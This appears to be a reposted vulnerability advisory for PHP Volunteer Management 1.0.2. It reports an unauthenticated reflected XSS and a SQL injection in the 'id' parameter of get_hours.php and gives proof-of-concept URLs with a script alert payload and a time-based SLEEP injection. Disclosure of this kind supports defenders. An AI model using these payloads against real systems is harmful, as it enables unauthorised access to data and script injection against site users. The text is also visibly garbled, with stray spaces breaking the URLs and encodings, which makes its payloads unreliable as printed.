Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
Author: G13 www.2cto.com
: Https://sourceforge.net/projects/phpvolunteer/
Affected Version: 1.0.2
0x01 description
0x02 XSS
0x03 SQL Injection
0x04 Vendor report
##### 0x01 overview #####
This is a PHP Volunteer Management software. Keep track of Volunteer
Hours worked and location assignments. This system is built on
PHP/MySql.
##### 0x02 XSS #####
--------------- Defect -------------------
The 'id' parameter on the get_hours.php page is vulnerable to XSS. No
Authentication is needed. This is a reflective XSS vulnerability.
---------- Test -----------------------------------
Http://www.bkjia.com/mods/hours/data/get_hours.php? Id = [XSS] & take = 10 & skip = 0 & page = 1 & pageSize = 10
------------ Use ---------------------------
Http://www.bkjia.com/mods/hours/data/get_hours.php? Id = % 27% 22% 3 Cscript % 3 Ealert % 281% 29; % 3C/script % 3E & take = 10 & skip = 0 & page = 1 & pageSize = 10
##### 0x03 SQL Injection #####
--------------- Defect -------------------
The 'id' parameter on the get_hours.php page is also vulnerable to SQL
Injection. No authentication is needed.
---------- Test -----------------------------------
Http: // localhost/MoD/hours/data/get_hours.php? Id = [SQLi] & take = 10 & skip = 0 & page = 1 & pageSize = 10
------------ Use ---------------------------
Http: // localhost/MoD/hours/data/get_hours.php? Id = 1% 27% 20AND % 20 SLEEP % 285% 29% 20AND % 20% 27 BDzu % 27 = % 27 BDzu & take = 10 & skip = 0 & page = 1 & pageSize = 10
Fix:
Filter